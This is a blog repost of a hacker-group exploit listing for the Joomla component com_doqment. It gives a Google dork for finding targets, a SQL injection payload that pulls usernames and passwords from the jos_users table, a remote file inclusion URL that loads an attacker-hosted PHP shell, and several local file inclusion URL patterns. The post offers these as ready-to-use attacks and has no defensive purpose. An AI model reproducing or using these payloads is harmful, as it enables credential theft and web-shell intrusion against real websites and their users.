Senin, 14 Maret 2011

Joomla Doqment SQL Injection / LFI / RFI 

Go0gle Dork : " inurl:com_doqment "
#==============>>>>> Exploit (1) SQL Injection %100 <<<<<=======================#
> DzSQL : -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid= ! [ DzSQL Here ] !

#==============>>>>> Exploit (2) Remote File Inclusion %50 <<<<<=================#
> DzShell : http://[Your-Space]/Sh311.php

> ComBug : admin.ponygallery.html.php?mosConfig_absolute_path=

> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid=[+ ComBug +]=[ ! DzShell ! ]
 
#==============>>>>> Exploit (3) Local File Inclusion %50 <<<<<=================#

> ExplO!t : http://[Target]/[Path]/components/com_doqment/documents?file=[LFI]
    >       http://[Target]/[Path]/components/com_doqment/documents/file?id=[LFI]
    >       http://[Target]/[Path]/components/com_doqment/documents/?=[LFI]
    >     http://[Target]/[Path]/components/com_doqment/files/?=[LFI]
    >       http://[Target]/[Path]/components/com_doqment/file/?=[LFI]
 
Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >


Diposting oleh dedexcaem di 18.06
Label:
 
blogger templates